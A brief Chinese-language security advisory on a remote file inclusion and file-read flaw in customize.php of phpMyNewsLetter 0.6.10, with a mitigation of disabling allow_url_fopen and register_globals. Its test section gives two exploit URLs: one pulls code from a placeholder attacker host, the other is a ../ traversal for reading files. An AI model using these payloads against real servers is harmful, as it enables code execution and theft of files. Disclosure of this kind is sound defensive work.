phpMyNewsLetter远程文件可包含漏洞发布时间:2002-10-09 更新时间:2002-10-09 严重程度:高 威胁程度:普通用户访问权限 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:5886 受影响系统 phpMyNewsLetter phpMyNewsLetter 0.6.10详细描述 phpMyNewsLetter存在漏洞,攻击者可以传递自己控制服务器上的文件给'customize.php'脚本中的CGI参数,导致自己控制服务器上的文件中包含的任意代码执行。 另外'customize.php'脚本也存在漏洞可以以WEB权利查看系统任意文件内容。 测试代码 http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World With in http://[attacker]/code.txt : <? echo $text; ?> or http://[target]/include/customize.php?l=../path/file/to/view 解决方案 在PHP配置文件中设置'allow_url_fopen'和'register_globals'为OFF。 相关信息 参考:http://online.securityfocus.com/archive/1/294060 |
